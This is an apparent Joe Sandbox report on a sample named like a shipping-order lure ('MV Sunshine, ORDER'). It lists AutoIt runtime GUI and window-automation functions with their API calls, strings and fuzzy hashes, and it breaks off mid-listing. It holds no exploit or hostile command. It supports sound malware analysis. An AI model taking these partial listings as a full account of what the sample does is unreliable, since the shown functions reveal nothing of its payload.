Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 892cc2f0d7fb3aa8e5a7392fbb3bdf96d0b78370cf9965c942873af5dc635a4a
Instruction ID: e50b2f864f59fed3dba6129ad46a952c39d3d65564399dbd50869ab08beeb4ef
Opcode Fuzzy Hash: 892cc2f0d7fb3aa8e5a7392fbb3bdf96d0b78370cf9965c942873af5dc635a4a
Instruction Fuzzy Hash: 82612D7190021CAFDB21DFA4EC48AAE7B79EB09320F118225F915BB2E1D7759D42DB90

Function 00A08C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A08D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08D45
CharNextW.USER32(0000014E), ref: 00A08D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A08DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A08DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A08DF9
SetWindowTextW.USER32(?,0000014E), ref: 00A08E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A08E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A08E8C
_memset.LIBCMT ref: 00A08EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A08EFA
_memset.LIBCMT ref: 00A08F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A08F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A08FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00A09088
InvalidateRect.USER32(?,00000000,00000001), ref: 00A090AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A090F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A09121
DrawMenuBar.USER32(?), ref: 00A09130
SetWindowTextW.USER32(?,0000014E), ref: 00A09158

Strings

0, xrefs: 00A090C2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: a878a231bae9982dbef17ff1e8f3293fa58b25e8091e5e8a71f2c2cdb0d6a04d
Instruction ID: 9637b9794d95190f193599be88d75197615d132c04250568932feeb27d024ea9
Opcode Fuzzy Hash: a878a231bae9982dbef17ff1e8f3293fa58b25e8091e5e8a71f2c2cdb0d6a04d
Instruction Fuzzy Hash: 6FE18D7490021DAEDF20DFA0DC88EEE7BB9EF05710F108255F955AA2D1DB748A82DF64

Function 00A04B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A04C51
GetDesktopWindow.USER32 ref: 00A04C66
GetWindowRect.USER32(00000000), ref: 00A04C6D
GetWindowLongW.USER32(?,000000F0), ref: 00A04CCF
DestroyWindow.USER32(?), ref: 00A04CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A04D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A04D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A04D68
SendMessageW.USER32(?,00000421,?,?), ref: 00A04D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A04D90
IsWindowVisible.USER32(?), ref: 00A04DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A04DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A04DDF
GetWindowRect.USER32(?,?), ref: 00A04DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00A04E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00A04E37
CopyRect.USER32(?,?), ref: 00A04E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00A04EB9

Strings

tooltips_class32, xrefs: 00A04D1D
0, xrefs: 00A04BFC
(, xrefs: 00A04E2A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: cc9e56ae3e248db5ed7b7dc86414715adc6ade1dd0af80c59ed1c184d2c56241
Instruction ID: 7cabb0cfbd2cc396555bdf00f5dab120a236ec109ac8549f22ff16a7799cc3d7
Opcode Fuzzy Hash: cc9e56ae3e248db5ed7b7dc86414715adc6ade1dd0af80c59ed1c184d2c56241
Instruction Fuzzy Hash: 24B19DB1608344AFDB14DF64D844B6ABBE4FF89314F00891CF699AB2A1DB71EC05CB91

Function 009827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828BC
GetSystemMetrics.USER32(00000007), ref: 009828C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828EF
GetSystemMetrics.USER32(00000008), ref: 009828F7
GetSystemMetrics.USER32(00000004), ref: 0098291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00982939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00982949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0098297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00982990
GetClientRect.USER32(00000000,000000FF), ref: 009829AE
GetStockObject.GDI32(00000011), ref: 009829CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 009829D5

Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
Part of subcall function 00982344: ScreenToClient.USER32(00A467B0,?), ref: 00982374
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7

SetTimer.USER32(00000000,00000000,00000028,00981256), ref: 009829FC

Strings

AutoIt v3 GUI, xrefs: 00982974

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4dbf61c7770e015c1ec073015315945419aee24902e352687f08d38c6fff0f30
Instruction ID: ce5a3e562112dec903f4e6e05df25c05c49d2eaaecef936e2bc9e999f154e267
Opcode Fuzzy Hash: 4dbf61c7770e015c1ec073015315945419aee24902e352687f08d38c6fff0f30
Instruction Fuzzy Hash: 39B18E75A0020AEFDF14EFA8DD45BED7BB4FB48714F108129FA15A7290DB74A842CB51

Function 00A04069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A040F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A041B6

Strings

GETSUBITEMCOUNT, xrefs: 00A04141
FINDITEM, xrefs: 00A04329
SELECTALL, xrefs: 00A0421D
VIEWCHANGE, xrefs: 00A04375
SELECT, xrefs: 00A04250
GETSELECTEDCOUNT, xrefs: 00A04199
SELECTINVERT, xrefs: 00A04286
ISSELECTED, xrefs: 00A041C1
GETITEMCOUNT, xrefs: 00A04128
GETTEXT, xrefs: 00A0415F
SELECTCLEAR, xrefs: 00A04235
GETSELECTED, xrefs: 00A042E4
DESELECT, xrefs: 00A042A4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 593f6d447d5280711a25cee38dbda87aa4da70d82debba3835aa361ece0e5902
Instruction ID: c326fd82bd19b4c34f7159c0d2efd055372a9ba854ebf36e422d2bf3d2d25dd7
Opcode Fuzzy Hash: 593f6d447d5280711a25cee38dbda87aa4da70d82debba3835aa361ece0e5902
Instruction Fuzzy Hash: E3A18EB02143059FCB14FF20D992B6AB3A5BFC9314F148969B99A9B3D2DB31EC05CB51

Function 009F52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 009F5309
LoadCursorW.USER32(00000000,00007F8A), ref: 009F5314
LoadCursorW.USER32(00000000,00007F00), ref: 009F531F
LoadCursorW.USER32(00000000,00007F03), ref: 009F532A
LoadCursorW.USER32(00000000,00007F8B), ref: 009F5335
LoadCursorW.USER32(00000000,00007F01), ref: 009F5340
LoadCursorW.USER32(00000000,00007F81), ref: 009F534B
LoadCursorW.USER32(00000000,00007F88), ref: 009F5356
LoadCursorW.USER32(00000000,00007F80), ref: 009F5361
LoadCursorW.USER32(00000000,00007F86), ref: 009F536C
LoadCursorW.USER32(00000000,00007F83), ref: 009F5377
LoadCursorW.USER32(00000000,00007F85), ref: 009F5382
LoadCursorW.USER32(00000000,00007F82), ref: 009F538D
LoadCursorW.USER32(00000000,00007F84), ref: 009F5398
LoadCursorW.USER32(00000000,00007F04), ref: 009F53A3
LoadCursorW.USER32(00000000,00007F02), ref: 009F53AE
GetCursorInfo.USER32(?), ref: 009F53BE
GetLastError.KERNEL32(00000001,00000000), ref: 009F53E9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 0c4dfbdeb82d24b37dec2b9550e66dc822a50dc297eee3fd432a967e0a531998
Instruction ID: e19be9b0fb21fb85593e76bf098801c8c82c0360880b3aa4919c8f19013544f2
Opcode Fuzzy Hash: 0c4dfbdeb82d24b37dec2b9550e66dc822a50dc297eee3fd432a967e0a531998
Instruction Fuzzy Hash: 0F415370E043196ADB109FBA8C4997EFFF8EF51B50B10452FA619E7290DAB8A401CF91

Function 009DAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009DAAA5
__swprintf.LIBCMT ref: 009DAB46
_wcscmp.LIBCMT ref: 009DAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009DABAE
_wcscmp.LIBCMT ref: 009DABEA
GetClassNameW.USER32(?,?,00000400), ref: 009DAC21
GetDlgCtrlID.USER32(?), ref: 009DAC73
GetWindowRect.USER32(?,?), ref: 009DACA9
GetParent.USER32(?), ref: 009DACC7
ScreenToClient.USER32(00000000), ref: 009DACCE
GetClassNameW.USER32(?,?,00000100), ref: 009DAD48
_wcscmp.LIBCMT ref: 009DAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 009DAD82
_wcscmp.LIBCMT ref: 009DAD96

Part of subcall function 009A386C: _iswctype.LIBCMT ref: 009A3874

Strings

%s%u, xrefs: 009DAB40

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: a549f2925bf2da5156bfef1dc4867f902704d9739e924268157860b122e9d9d9
Instruction ID: dcbd00e64536465971bf9f24260e74a48398b7084aa59f0b225a7ae5fc4f1b58
Opcode Fuzzy Hash: a549f2925bf2da5156bfef1dc4867f902704d9739e924268157860b122e9d9d9
Instruction Fuzzy Hash: FEA10331244306AFDB14DF64C884BAAB7EDFF44315F00C62AF999D2690D734E966CB92

Function 009DB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 009DB3DB
_wcscmp.LIBCMT ref: 009DB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 009DB414
CharUpperBuffW.USER32(?,00000000), ref: 009DB431
_wcscmp.LIBCMT ref: 009DB44F
_wcsstr.LIBCMT ref: 009DB460
GetClassNameW.USER32(00000018,?,00000400), ref: 009DB498
_wcscmp.LIBCMT ref: 009DB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 009DB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 009DB518
_wcscmp.LIBCMT ref: 009DB528
GetClassNameW.USER32(00000010,?,00000400), ref: 009DB550
GetWindowRect.USER32(00000004,?), ref: 009DB5B9

Strings

ThumbnailClass, xrefs: 009DB4A3, 009DB523
@, xrefs: 009DB3BC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f1a24f978a76e87228e02e1e45115b9b527267c11dcd2901b9dd45d3c0dad551
Instruction ID: 2d53ed483f6a91fccdeec7aed60a664bb26ba89e297900a1b76b9264c181a211
Opcode Fuzzy Hash: f1a24f978a76e87228e02e1e45115b9b527267c11dcd2901b9dd45d3c0dad551
Instruction Fuzzy Hash: CA81AC71048209DBDB10DF10D885FAABBECEF84714F04C56AFD859A2A2DB34DD46CBA1

Function 009DB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009DB23F

Strings

[ALL, xrefs: 009DB2E5
ALL, xrefs: 009DB2D3
[ACTIVE, xrefs: 009DB22C
[LAST, xrefs: 009DB2EC
ACTIVE, xrefs: 009DB21A
[HANDLE:, xrefs: 009DB24B
CLASSNAME=, xrefs: 009DB27C
[CLASS:, xrefs: 009DB28F
LAST, xrefs: 009DB204
REGEXP=, xrefs: 009DB254
[REGEXPTITLE:, xrefs: 009DB267
HANDLE=, xrefs: 009DB238

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b8b73a0bae4f82126362c639ce8f858a35fb03ba617c638f45908dc9270b20a0
Instruction ID: 8c2afe739bd6c5336d0e17e08abb042f3a1308214de712c13777156e9f34e2c2
Opcode Fuzzy Hash: b8b73a0bae4f82126362c639ce8f858a35fb03ba617c638f45908dc9270b20a0
Instruction Fuzzy Hash: 2B31D632588305F6DB14FA60CD43FEFB7A8AF64750F614816F551712D1EF91AE04C691

Function 009DC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 009DC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009DC4E6
SetWindowTextW.USER32(?,?), ref: 009DC4FD
GetDlgItem.USER32(?,000003EA), ref: 009DC512
SetWindowTextW.USER32(00000000,?), ref: 009DC518
GetDlgItem.USER32(?,000003E9), ref: 009DC528
SetWindowTextW.USER32(00000000,?), ref: 009DC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009DC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009DC569
GetWindowRect.USER32(?,?), ref: 009DC572
SetWindowTextW.USER32(?,?), ref: 009DC5DD
GetDesktopWindow.USER32 ref: 009DC5E3
GetWindowRect.USER32(00000000), ref: 009DC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009DC636
GetClientRect.USER32(?,?), ref: 009DC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009DC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009DC693

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 4eee1b45bb075a24fce026f87646ef038f7e4de399613fdcd59cbf909c91fc97
Instruction ID: b5be74d7dcd10d46f9d1f72d1b8a2ab8c7da532ae5cc12d4d7228ad07bb07750
Opcode Fuzzy Hash: 4eee1b45bb075a24fce026f87646ef038f7e4de399613fdcd59cbf909c91fc97
Instruction Fuzzy Hash: C451607094070AAFDB20DFA8DD85B6EBBB9FF04705F004929F642A26A0D775E906CB50

Function 00A0A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0A4C8
DestroyWindow.USER32(?,?), ref: 00A0A542

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A0A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A0A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A5F1
DestroyWindow.USER32(00000000), ref: 00A0A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A0A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A663
GetDesktopWindow.USER32 ref: 00A0A67C
GetWindowRect.USER32(00000000), ref: 00A0A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A0A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A0A6B3

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

Strings

tooltips_class32, xrefs: 00A0A5B5, 00A0A643
0, xrefs: 00A0A4DE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7ff2153c02ca5507591c0d643756d0c72fda226a8d77ad3e86d41c6e2f5977b1
Instruction ID: 342c671fdbfa42c65367233220e35d7d67bd1a874f5a58897ee6cb3a49f750c8
Opcode Fuzzy Hash: 7ff2153c02ca5507591c0d643756d0c72fda226a8d77ad3e86d41c6e2f5977b1
Instruction Fuzzy Hash: 7E718675140349AFD720CFA8DC49F6A7BF6FB99300F084928F985972A1D772A942CB12

Function 00A0C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DragQueryPoint.SHELL32(?,?), ref: 00A0C917

Part of subcall function 00A0ADF1: ClientToScreen.USER32(?,?), ref: 00A0AE1A
Part of subcall function 00A0ADF1: GetWindowRect.USER32(?,?), ref: 00A0AE90
Part of subcall function 00A0ADF1: PtInRect.USER32(?,?,00A0C304), ref: 00A0AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A0C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A0C9AE
_wcscat.LIBCMT ref: 00A0C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A0C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00A0CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A0CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00A0CA47
DragFinish.SHELL32(?), ref: 00A0CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A0CB41

Strings

@GUI_DRAGFILE, xrefs: 00A0CAF0
@GUI_DRAGID, xrefs: 00A0CAB9
@GUI_DROPID, xrefs: 00A0CA6E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: b3f3728d0b79a6d59aaa43e367273b3aebbf772cc9dc2f9f4679c63b2760ab8c
Instruction ID: b3bd8c343034cec36abbc0215b1be4585c736a872a072ea0fc2305e3c5255e35
Opcode Fuzzy Hash: b3f3728d0b79a6d59aaa43e367273b3aebbf772cc9dc2f9f4679c63b2760ab8c
Instruction Fuzzy Hash: 51615B71108305AFC711EFA4DC85E9BBBE8EBC9710F400A1DF591962A1DB719A4ACB52

Function 00A04619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A046AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A046F6

Strings

COLLAPSE, xrefs: 00A0473C
UNCHECK, xrefs: 00A048D2
GETTOTALCOUNT, xrefs: 00A046DD
GETITEMCOUNT, xrefs: 00A047D8
GETTEXT, xrefs: 00A04849
GETSELECTED, xrefs: 00A04806
SELECT, xrefs: 00A048A7
EXISTS, xrefs: 00A0475F
CHECK, xrefs: 00A04716
ISCHECKED, xrefs: 00A04879
EXPAND, xrefs: 00A047A8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
